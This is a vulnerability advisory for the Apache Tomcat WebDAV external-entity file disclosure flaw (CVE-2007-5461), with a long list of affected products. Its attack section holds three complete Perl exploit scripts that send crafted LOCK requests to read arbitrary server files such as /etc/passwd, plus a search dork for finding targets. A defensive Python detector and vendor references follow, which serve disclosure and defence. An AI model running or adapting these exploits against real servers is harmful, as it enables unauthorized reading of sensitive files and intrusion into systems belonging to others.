Written by eliteb0y
Wednesday, 11 March 2009 22:12
Apache Tomcat WebDav Remote Information Disclosure Vulnerability
-\\Bugtraq ID: 26070
-\\Class: Design Error
-\\CVE: CVE-2007-5461 CVE-2007-5731
-\\Remote: Yes
-\\Local: No
-\\Published: Oct 14 2007 12:00AM
-\\Updated: Mar 11 2009 05:46PM
-\\Credit: eliteb0y discovered this issue.
-\\Vulnerable: WiKID Systems WiKID Server 3.0.4 VMWare VirtualCenter Management Server 2 VMWare ESX Server 3.0.2 VMWare ESX Server 3.0.1 VMWare ESX Server 3.5 Sun Solaris 9_x86 Sun Solaris 9_sparc Sun Solaris 9 Sun Solaris 10_x86 Sun Solaris 10_sparc Sun Solaris 10 S.u.S.E. UnitedLinux 1.0 S.u.S.E. SuSE Linux Standard Server 8.0 S.u.S.E. SuSE Linux School Server for i386 S.u.S.E. SUSE LINUX Retail Solution 8.0 S.u.S.E. SuSE Linux Openexchange Server 4.0 S.u.S.E. SuSE Linux Open-Xchange 4.1 S.u.S.E. SUSE Linux Enterprise Server 9 SP3 S.u.S.E. SUSE Linux Enterprise Server 10 SP2 S.u.S.E. SUSE Linux Enterprise Server 10 SP1 S.u.S.E. SUSE Linux Enterprise Server 10 S.u.S.E. SUSE Linux Enterprise Desktop 10 SP1 S.u.S.E. SUSE Linux Enterprise Desktop 10 S.u.S.E. SUSE Linux Enterprise 10 SP1 DEBUGINFO S.u.S.E. SUSE Linux Enterprise 10 SP1 DEBUGINFO S.u.S.E. SLE SDK 10.SP1 S.u.S.E. SLE SDK 10 S.u.S.E. openSUSE 10.3 S.u.S.E. openSUSE 10.2 S.u.S.E. openSUSE 10.1 S.u.S.E. Open-Enterprise-Server 9.0 S.u.S.E. Open-Enterprise-Server 1 S.u.S.E. Open-Enterprise-Server 0 S.u.S.E. Office Server S.u.S.E. Novell Linux POS 9 S.u.S.E. Novell Linux Desktop SDK 9.0 S.u.S.E. Novell Linux Desktop 9.0 S.u.S.E. Novell Linux Desktop 1.0 S.u.S.E. Novell Linux Desktop 9 S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 10.2 x86_64 S.u.S.E. Linux Professional 10.2 S.u.S.E. Linux Professional 10.1 S.u.S.E. Linux Personal 10.0 OSS S.u.S.E. Linux Personal 10.2 x86_64 S.u.S.E. Linux Personal 10.2 S.u.S.E. Linux Personal 10.1 S.u.S.E. Linux Openexchange Server S.u.S.E. Linux Enterprise Server 9 S.u.S.E. Linux Enterprise Server 8 S.u.S.E. Linux Enterprise Server 10.SP1 S.u.S.E. Linux Enterprise Server 10 S.u.S.E. Linux Enterprise SDK 10 SP1 S.u.S.E. Linux Enterprise SDK 10 S.u.S.E. Linux Desktop 1.0 S.u.S.E. Linux Desktop 10 S.u.S.E. Linux 10.1 x86-64 S.u.S.E. Linux 10.1 x86 S.u.S.E. Linux 10.1 ppc S.u.S.E. Linux 10.0 x86-64 S.u.S.E. 
Linux 10.0 x86 S.u.S.E. Linux 10.0 ppc RedHat Red Hat Network Satellite Server 5.0 RedHat Red Hat Network Satellite (for RHEL 4) 5.1 RedHat Network Satellite (for RHEL 4) 4.2 RedHat Fedora 7 0 RedHat Enterprise Linux Desktop Workstation 5 client RedHat Enterprise Linux Desktop 5 client RedHat Enterprise Linux 5 server RedHat Developer Suite EL4 3 RedHat Application Server WS4 2 RedHat Application Server ES4 2 RedHat Application Server AS4 2 RedHat Network Satellite (for RHEL 3) 4.2 Pardus Linux 2008 0 MandrakeSoft Linux Mandrake 2008.0 x86_64 MandrakeSoft Linux Mandrake 2008.0 MandrakeSoft Linux Mandrake 2007.1 x86_64 MandrakeSoft Linux Mandrake 2007.1 IBM WebSphere Application Server Community Edition 2.0 1 IBM WebSphere Application Server Community Edition 2.0 IBM WebSphere Application Server Community Edition 1.1 2 IBM WebSphere Application Server Community Edition 1.1 1 IBM WebSphere Application Server Community Edition 1.0.1 2 IBM WebSphere Application Server Community Edition 1.0.1 1 IBM WebSphere Application Server Community Edition 1.0.1 IBM WebSphere Application Server Community Edition 1.0 1 IBM WebSphere Application Server Community Edition 1.1 IBM WebSphere Application Server Community Edition 1.0 Gentoo www-servers/tomcat 6.0.15 Gentoo www-servers/tomcat 6.0.14 Gentoo www-servers/tomcat 6.0.13 Gentoo www-servers/tomcat 6.0.12 Gentoo www-servers/tomcat 6.0.11 Gentoo www-servers/tomcat 6.0.10 Gentoo www-servers/tomcat 6.0.9 Gentoo www-servers/tomcat 6.0.8 Gentoo www-servers/tomcat 6.0.7 Gentoo www-servers/tomcat 6.0.6 Gentoo www-servers/tomcat 6.0.5 Gentoo www-servers/tomcat 6.0.4 Gentoo www-servers/tomcat 6.0.3 Gentoo www-servers/tomcat 6.0.2 Gentoo www-servers/tomcat 6.0.1 Gentoo www-servers/tomcat 6.0 Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4.0 mipsel Debian Linux 4.0 mips Debian Linux 4.0 m68k Debian Linux 4.0 ia-64 Debian Linux 4.0 ia-32 Debian Linux 4.0 hppa Debian Linux 4.0 arm Debian Linux 4.0 amd64 
Debian Linux 4.0 alpha Debian Linux 4.0 Avaya Meeting Exchange - Enterprise Edition Avaya Meeting Exchange 5.0 .0.52 Avaya Meeting Exchange 5.0 Avaya AES 4.2.1 Avaya AES 4.0.1 Avaya AES 3.1.6 Avaya AES 3.1.5 Avaya AES 3.1.4 Avaya AES 3.1.3 Avaya AES 4.2 Avaya AES 4.1 Avaya AES 4.0 Avaya AES 3.1 Avaya AES 3.0 Apple Mac OS X Server 10.5.5 Apple Mac OS X Server 10.4.11 Apple Mac OS X Server 10.4.10 Apple Mac OS X Server 10.4.9 Apple Mac OS X Server 10.4.8 Apple Mac OS X Server 10.4.7 Apple Mac OS X Server 10.4.6 Apple Mac OS X Server 10.4.5 Apple Mac OS X Server 10.4.4 Apple Mac OS X Server 10.4.3 Apple Mac OS X Server 10.4.2 Apple Mac OS X Server 10.4.1 Apple Mac OS X Server 10.4 Apple Mac OS X 10.4.11 Apple Mac OS X 10.4.10 Apple Mac OS X 10.4.9 Apple Mac OS X 10.4.8 Apple Mac OS X 10.4.7 Apple Mac OS X 10.4.6 Apple Mac OS X 10.4.5 Apple Mac OS X 10.4.4 Apple Mac OS X 10.4.3 Apple Mac OS X 10.4.2 Apple Mac OS X 10.4.1 Apple Mac OS X 10.4 Apache Software Foundation Tomcat 6.0.14 Apache Software Foundation Tomcat 6.0.13 Apache Software Foundation Tomcat 6.0.12 Apache Software Foundation Tomcat 6.0.11 Apache Software Foundation Tomcat 6.0.10 Apache Software Foundation Tomcat 6.0.9 Apache Software Foundation Tomcat 6.0.8 Apache Software Foundation Tomcat 6.0.7 Apache Software Foundation Tomcat 6.0.6 Apache Software Foundation Tomcat 6.0.5 Apache Software Foundation Tomcat 6.0.4 Apache Software Foundation Tomcat 6.0.3 Apache Software Foundation Tomcat 6.0.2 Apache Software Foundation Tomcat 6.0.1 Apache Software Foundation Tomcat 6.0 Apache Software Foundation Tomcat 5.5.24 Apache Software Foundation Tomcat 5.5.23 Apache Software Foundation Tomcat 5.5.22 Apache Software Foundation Tomcat 5.5.21 Apache Software Foundation Tomcat 5.5.20 Apache Software Foundation Tomcat 5.5.20 + Gentoo Linux 1.4 _rc3 + Gentoo Linux 1.4 _rc2 + Gentoo Linux 1.4 _rc1 + Gentoo Linux 1.2 Apache Software Foundation Tomcat 5.5.19 Apache Software Foundation Tomcat 5.5.18 Apache Software Foundation 
Tomcat 5.5.17 Apache Software Foundation Tomcat 5.5.17 Apache Software Foundation Tomcat 5.5.16 Apache Software Foundation Tomcat 5.5.15 Apache Software Foundation Tomcat 5.5.14 Apache Software Foundation Tomcat 5.5.13 Apache Software Foundation Tomcat 5.5.12 Apache Software Foundation Tomcat 5.5.12 Apache Software Foundation Tomcat 5.5.11 Apache Software Foundation Tomcat 5.5.11 Apache Software Foundation Tomcat 5.5.10 Apache Software Foundation Tomcat 5.5.10 Apache Software Foundation Tomcat 5.5.9 Apache Software Foundation Tomcat 5.5.9 Apache Software Foundation Tomcat 5.5.8 Apache Software Foundation Tomcat 5.5.8 Apache Software Foundation Tomcat 5.5.7 Apache Software Foundation Tomcat 5.5.7 Apache Software Foundation Tomcat 5.5.6 Apache Software Foundation Tomcat 5.5.6 Apache Software Foundation Tomcat 5.5.5 Apache Software Foundation Tomcat 5.5.5 Apache Software Foundation Tomcat 5.5.4 Apache Software Foundation Tomcat 5.5.4 Apache Software Foundation Tomcat 5.5.3 Apache Software Foundation Tomcat 5.5.3 Apache Software Foundation Tomcat 5.5.2 Apache Software Foundation Tomcat 5.5.2 Apache Software Foundation Tomcat 5.5.1 Apache Software Foundation Tomcat 5.5.1 Apache Software Foundation Tomcat 5.5 Apache Software Foundation Tomcat 5.5 Apache Software Foundation Tomcat 5.4 Apache Software Foundation Tomcat 5.3 Apache Software Foundation Tomcat 5.2 Apache Software Foundation Tomcat 5.1 Apache Software Foundation Tomcat 5.0.31 Apache Software Foundation Tomcat 5.0.30 Apache Software Foundation Tomcat 5.0.30 Apache Software Foundation Tomcat 5.0.28 Apache Software Foundation Tomcat 5.0.19 Apache Software Foundation Tomcat 5.0.16 Apache Software Foundation Tomcat 5.0.15 Apache Software Foundation Tomcat 5.0.14 Apache Software Foundation Tomcat 5.0.13 Apache Software Foundation Tomcat 5.0.12 Apache Software Foundation Tomcat 5.0.11 Apache Software Foundation Tomcat 5.0.10 Apache Software Foundation Tomcat 5.0.9 Apache Software Foundation Tomcat 5.0.8 Apache 
Software Foundation Tomcat 5.0.7 Apache Software Foundation Tomcat 5.0.6 Apache Software Foundation Tomcat 5.0.5 Apache Software Foundation Tomcat 5.0.4 Apache Software Foundation Tomcat 5.0.3 Apache Software Foundation Tomcat 5.0.2 Apache Software Foundation Tomcat 5.0.1 Apache Software Foundation Tomcat 5.0 Apache Software Foundation Tomcat 4.1.37 Apache Software Foundation Tomcat 4.1.36 Apache Software Foundation Tomcat 4.1.36 Apache Software Foundation Tomcat 4.1.34 Apache Software Foundation Tomcat 4.1.34 + Gentoo Linux 1.4 _rc3 + Gentoo Linux 1.4 _rc2 + Gentoo Linux 1.4 _rc1 + Gentoo Linux 1.2 Apache Software Foundation Tomcat 4.1.32 Apache Software Foundation Tomcat 4.1.31 Apache Software Foundation Tomcat 4.1.24 Apache Software Foundation Tomcat 4.1.12 Apache Software Foundation Tomcat 4.1.10 Apache Software Foundation Tomcat 4.1.9 beta Apache Software Foundation Tomcat 4.1.3 beta Apache Software Foundation Tomcat 4.1 Apache Software Foundation Tomcat 4.1 Apache Software Foundation Tomcat 4.0.7 Apache Software Foundation Tomcat 4.0.6 Apache Software Foundation Tomcat 4.0.6 Apache Software Foundation Tomcat 4.0.5 Apache Software Foundation Tomcat 4.0.5 + RedHat Stronghold 4.0 Apache Software Foundation Tomcat 4.0.4 Apache Software Foundation Tomcat 4.0.4 Apache Software Foundation Tomcat 4.0.3 Apache Software Foundation Tomcat 4.0.3 + Debian Linux 3.0 sparc + Debian Linux 3.0 s/390 + Debian Linux 3.0 ppc + Debian Linux 3.0 mipsel + Debian Linux 3.0 mips + Debian Linux 3.0 m68k + Debian Linux 3.0 ia-64 + Debian Linux 3.0 ia-32 + Debian Linux 3.0 hppa + Debian Linux 3.0 arm + Debian Linux 3.0 alpha Apache Software Foundation Tomcat 4.0.2 Apache Software Foundation Tomcat 4.0.2 Apache Software Foundation Tomcat 4.0.1 Apache Software Foundation Tomcat 4.0.1 Apache Software Foundation Tomcat 4.0 -BSDI BSD/OS 4.0 -Caldera OpenLinux 2.4 -Conectiva Linux 5.1 -Debian Linux 2.2 -Debian Linux 2.1 -Digital UNIX 4.0 -FreeBSD FreeBSD 5.0 -FreeBSD FreeBSD 4.0 -MandrakeSoft 
Linux Mandrake 7.1 -MandrakeSoft Linux Mandrake 7.0 -NetBSD NetBSD 1.4.2 x86 -NetBSD NetBSD 1.4.1 x86 -RedHat Linux 6.2 i386 -RedHat Linux 6.1 i386 -SGI IRIX 6.5 -SGI IRIX 6.4 -Sun Solaris 8 -Sun Solaris 7.0 Apache Software Foundation Tomcat 4.0 Apache Software Foundation Tomcat 5.0 Apache Software Foundation Tomcat 4.0.0 RC2 Apache Software Foundation Jakarta Slide 2.1 Apache Software Foundation Geronimo 2.0.2 Apache Software Foundation Geronimo 2.0.1 Apache Software Foundation Geronimo 1.1 Apache Software Foundation Geronimo 1.0.1 Apache Software Foundation Geronimo 1.0
-\\Not Vulnerable: WiKID Systems WiKID Server 3.0.5
-\\Discussion: Apache Tomcat is prone to a remote information-disclosure vulnerability. Remote attackers can exploit this issue to obtain the contents of sensitive files stored on the server.
-\\Exploit(s)/PoC(s): The following exploits are available:
===============================================================
tomcat_webdav_26070.pl
^^^^^^^^^^^^^^^^^^^^^^^
#!/usr/bin/perl
#******************************************************
# Apache Tomcat Remote File Disclosure Zeroday Xploit
# kcdarookie aka eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************

use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?

# SET REMOTE PORT HERE
$remoteport = 8080;

sub usage {
    print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
    print "kcdarookie aka eliteb0y / 2007\n";
    print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password]\n";
    print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";
    exit;
}

if ($#ARGV < 2) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];

$username = $ARGV[3];
$password = $ARGV[4];

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                                 PeerPort => $remoteport,
                                 Proto => 'tcp');
$|=1;
$BasicAuth = encode_base64("$username:$password");

$KRADXmL =
    "<?xml version=\"1.0\"?>\n"
    ."<!DOCTYPE REMOTE [\n"
    ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
    ."]>\n"
    ."<D:lockinfo xmlns:D='DAV:'>\n"
    ."<D:lockscope><D:exclusive/></D:lockscope>\n"
    ."<D:locktype><D:write/></D:locktype>\n"
    ."<D:owner>\n"
    ."<D:href>\n"
    ."<REMOTE>\n"
    ."<RemoteX>&RemoteX;</RemoteX>\n"
    ."</REMOTE>\n"
    ."</D:href>\n"
    ."</D:owner>\n"
    ."</D:lockinfo>\n";

print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";

$ExploitRequest =
    "LOCK $webdavfile HTTP/1.1\r\n"
    ."Host: $hostname\r\n";

if ($username ne "") {
    $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;

print $sock $ExploitRequest;

while(<$sock>) {
    print;
}
===============================================================
tomcat_webdav_ssl_only_26070.pl
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#!/usr/bin/perl
#================================================================
# Apache Tomcat Remote File Disclosure Zeroday Xploit - With support for SSL
# MoDiFiEd version by : h3rcul3s
# ORiGiNaL Version by : kcdarookie aka eliteb0y / 2007 http://milw0rm.org/exploits/4530
# MoDiFiCaTiOn : This code is useble against targets over SSL
# Prerequisites : A valid login credentials, webdav
# DoRk : intitle:"Directory Listing For /" + inurl:webdav tomcat
# Potential targets : similar to https://www.somehost.com:8443
#================================================================
# THaNkS To eliteb0y, the whole team AnD "perlmonks".
# This piece of code is written ONLY for educational purpose.
# Use it at your own risk.
# No author will be responsible for any damage.
#================================================================
# -------------------------[C O D E]-----------------------------
#================================================================
use LWP::Protocol::https;
use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?

# SET REMOTE PORT HERE--------------------------------------------
$remoteport = 8443;

sub usage {
    print "\nApache Tomcat Remote File Disclosure Zeroday Xploit\n";
    print "\n\n";
    print "Basic exploit by : kcdarookie aka eliteb0y / 2007\n";
    print "SSL Support added by : .o0|h 3 r c u l 3 s|0o. \n";
    print "\n\n";
    print "USAGE :\nperl TOMCATXPL-SSL <remotehost> <webdav file> <file to retrieve> [username] [password] [https]\n";
    print "\nExample:\nperl TOMCATXPL-SSL www.hostname.com /webdav /etc/passwd tomcat tomcat https\n\n";
    exit;
}

if ($#ARGV < 2) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];
$username = $ARGV[3];
$password = $ARGV[4];

my $sock = LWP::Protocol::https::Socket->new(PeerAddr => $hostname,
                                             PeerPort => $remoteport,
                                             Proto => 'tcp');
$|=1;

$BasicAuth = encode_base64("$username:$password");

$KRADXmL =
    "<?xml version=\"1.0\"?>\n"
    ."<!DOCTYPE REMOTE [\n"
    ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
    ."]>\n"
    ."<D:lockinfo xmlns:D='DAV:'>\n"
    ."<D:lockscope><D:exclusive/></D:lockscope>\n"
    ."<D:locktype><D:write/></D:locktype>\n"
    ."<D:owner>\n"
    ."<D:href>\n"
    ."<REMOTE>\n"
    ."<RemoteX>&RemoteX;</RemoteX>\n"
    ."</REMOTE>\n"
    ."</D:href>\n"
    ."</D:owner>\n"
    ."</D:lockinfo>\n";

print "\nApache Tomcat Remote File Disclosure Zeroday Eploit-SSL verssion\n";
print "\n";
print "Launching Remote Exploit over SSL...\n";

$ExploitRequest =
    "LOCK $webdavfile HTTP/1.1\r\n"
    ."Host: $hostname\r\n";

if ($username ne "") {
    $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;

print $sock $ExploitRequest;

while(<$sock>) {
    print;
}
===============================================================
jakarta_slide_26070.pl
^^^^^^^^^^^^^^^^^^^^^^^
#!/usr/bin/perl
#******************************************************
# Jakarta Slide Remote File Disclosure Zeroday Xploit
# eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************

use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?

# SET REMOTE PORT HERE
$remoteport = 8080;

sub usage {
    print "Jakarta Slide Remote File Disclosure Zeroday Xploit\n";
    print "eliteb0y / 2007\n";
    print "usage: perl JAKARTAXPL <remotehost> <slide file> <file to retrieve> [username] [password]\n";
    print "example: perl JAKARTAXPL www.hostname.com /slide/users/guest /etc/passwd guest guest\n";
    exit;
}

if ($#ARGV < 2) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];

$username = $ARGV[3];
$password = $ARGV[4];

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                                 PeerPort => $remoteport,
                                 Proto => 'tcp');
$|=1;
$BasicAuth = encode_base64("$username:$password");

$KRADXmL =
    "<?xml version=\"1.0\"?>\n"
    ."<!DOCTYPE REMOTE [\n"
    ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
    ."]>\n"
    ."<D:lockinfo xmlns:D='DAV:'>\n"
    ."<D:lockscope><D:exclusive/></D:lockscope>\n"
    ."<D:locktype><D:write/></D:locktype>\n"
    ."<D:owner>\n"
    ."<D:href>\n"
    ."<REMOTE>\n"
    ."<RemoteX>&RemoteX;</RemoteX>\n"
    ."</REMOTE>\n"
    ."</D:href>\n"
    ."</D:owner>\n"
    ."</D:lockinfo>\n";

print "Jakarta Slide Remote File Disclosure Zeroday Xploit\n";
print "eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";

$ExploitRequest =
    "LOCK $webdavfile HTTP/1.1\r\n"
    ."Host: $hostname\r\n";

if ($username ne "") {
    $ExploitRequest .= "Authorization: Basic $BasicAuth";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;

print $sock $ExploitRequest;

while(<$sock>) {
    print;
}
-\\Solution: Fixes are available in the Tomcat SVN repository. Please see the referenced advisories for more information.
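For hosts that cannot be patched immediately, the construct all three PoCs place in the LOCK body (a DOCTYPE declaring an external entity) can be flagged at a proxy or in captured traffic. The following Python code is an added example, not part of the original advisory or of Tomcat; the function names, the host `dav.example.test`, the file path and the allow/review/block policy are assumptions made for illustration.

```python
import re

# WebDAV methods (RFC 4918) whose XML request bodies the server parses.
WEBDAV_XML_METHODS = {"LOCK", "PROPFIND", "PROPPATCH"}

_COMMENT = re.compile(r"<!--.*?-->", re.S)
_DOCTYPE = re.compile(r"<!DOCTYPE\s")
# <!ENTITY [%] name SYSTEM "uri">  or  <!ENTITY [%] name PUBLIC "pubid" "uri">
_EXT_ENTITY = re.compile(
    r"<!ENTITY\s+(?:%\s+)?(?P<name>\S+)\s+(?:SYSTEM|PUBLIC)\s+"
    r"(?:\"[^\"]*\"\s+|'[^']*'\s+)?(?P<q>[\"'])(?P<uri>.*?)(?P=q)",
    re.S,
)

def decode_body(raw: bytes) -> str:
    """Decode the body so a UTF-16 encoding does not hide the markup."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def inspect_request(raw: bytes) -> dict:
    """Classify one raw HTTP request as allow / review / block."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split()
    result = {
        "method": parts[0].upper() if parts else "",
        "path": parts[1] if len(parts) > 1 else "",
        "doctype": False,
        "external_entities": [],
        "verdict": "allow",
    }
    if result["method"] not in WEBDAV_XML_METHODS or not body.strip():
        return result
    xml = _COMMENT.sub("", decode_body(body))  # ignore commented-out markup
    result["doctype"] = bool(_DOCTYPE.search(xml))
    result["external_entities"] = [(m["name"], m["uri"]) for m in _EXT_ENTITY.finditer(xml)]
    if result["external_entities"]:
        result["verdict"] = "block"    # external entity, as in the PoC body
    elif result["doctype"]:
        result["verdict"] = "review"   # assumed policy: a DTD is unexpected here
    return result

def build_request(method: str, path: str, body: bytes) -> bytes:
    """Build a constructed sample request (hypothetical host)."""
    head = (f"{method} {path} HTTP/1.1\r\nHost: dav.example.test\r\n"
            f"Content-Type: text/xml\r\nContent-Length: {len(body)}\r\n\r\n")
    return head.encode("ascii") + body

# Constructed samples: a body shaped like the PoC's, and an ordinary lock request.
_LOCKINFO = ("<D:lockinfo xmlns:D='DAV:'><D:lockscope><D:exclusive/></D:lockscope>"
             "<D:locktype><D:write/></D:locktype><D:owner><D:href>%s</D:href>"
             "</D:owner></D:lockinfo>")
ENTITY_BODY = ('<?xml version="1.0"?>\n<!DOCTYPE REMOTE [\n'
               '<!ENTITY RemoteX SYSTEM "/constructed/path/file.txt">\n]>\n'
               + _LOCKINFO % "<REMOTE><RemoteX>&RemoteX;</RemoteX></REMOTE>")
PLAIN_BODY = '<?xml version="1.0"?>\n' + _LOCKINFO % "http://example.test/~user"

if __name__ == "__main__":
    for body in (ENTITY_BODY.encode(), ENTITY_BODY.encode("utf-16"), PLAIN_BODY.encode()):
        print(inspect_request(build_request("LOCK", "/webdav/doc.txt", body)))
```

A match here is a traffic-level signal only; the durable fix remains the patched WebDAV servlet referenced in the advisories.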
-\\Reference(s):
--About the security content of Security Update 2008-004 and Mac OS X 10.5.4 http://support.apple.com/kb/HT216 (Apple)
--Apache Geronimo Potential vulnerability in Apache Tomcat Webdav servlet http://geronimo.apache.org/2007/10/18/potential-vulnerability-in-apache-tomcat-webdav-servlet.htm (Apache)
--Apache Geronimo Web Site http://geronimo.apache.or (Apache)
--Apache Tomcat 4.x vulnerabilities http://tomcat.apache.org/security-4.htm (Apache)
--Apache Tomcat 5.x vulnerabilities http://tomcat.apache.org/security-5.htm (Apache)
--Apache Tomcat 6.x vulnerabilities http://tomcat.apache.org/security-6.htm (Apache)
--Apache Tomcat Homepage http://tomcat.apache.org (Apache)
--GERONIMO-3549: Potential vulnerability in Apache Tomcat Webdav servlet https://issues.apache.org/jira/browse/GERONIMO-354 (Apache)
--Important vulnerability disclosed in Apache Tomcat webdav servlet http://mail-archives.apache.org/mod_mbox/tomcat-users/200710.mbox/%[...]%3 (Apache)
--Release Name: 3.0.5 https://sourceforge.net/project/shownotes.php?release_id=626903&group_id=14477 (WiKID Systems)
--Tomcat Webdav servlet security vulnerability in WebSphere Application Server Com http://www-1.ibm.com/support/docview.wss?uid=swg2128611 (IBM)
--WebDAV Homepage www.webdav.org (WebDAV)
--ASA-2008-401 - tomcat security update (RHSA-2008-0862) http://support.avaya.com/elmodocs2/security/ASA-2008-401.ht (Avaya)
--RHSA-2008:0042-4 - tomcat security update https://rhn.redhat.com/errata/RHSA-2008-0042.htm (Red Hat)
--RHSA-2008:0195-5 tomcat security update http://rhn.redhat.com/errata/RHSA-2008-0195.htm (Red Hat)
--RHSA-2008:0261-4 Moderate: Red Hat Network Satellite Server security update http://rhn.redhat.com/errata/RHSA-2008-0261.htm (Red Hat)
--RHSA-2008:0524-4 Red Hat Network Satellite Server security update http://rhn.redhat.com/errata/RHSA-2008-0524.htm (Red Hat)
--RHSA-2008:0630-3 Low: Red Hat Network Satellite Server security update http://rhn.redhat.com/errata/RHSA-2008-0630.htm (Red Hat)
--Security Vulnerabilities in Tomcat 4.0 Shipped with Solaris 9 and 10 http://sunsolve.sun.com/search/document.do?assetkey=1-66-239312- (Sun Microsystems)
--Solution 239312 : Security Vulnerabilities in Tomcat 4.0 Shipped with Solaris http://sunsolve.sun.com/search/document.do?assetkey=1-66-239312- (Sun)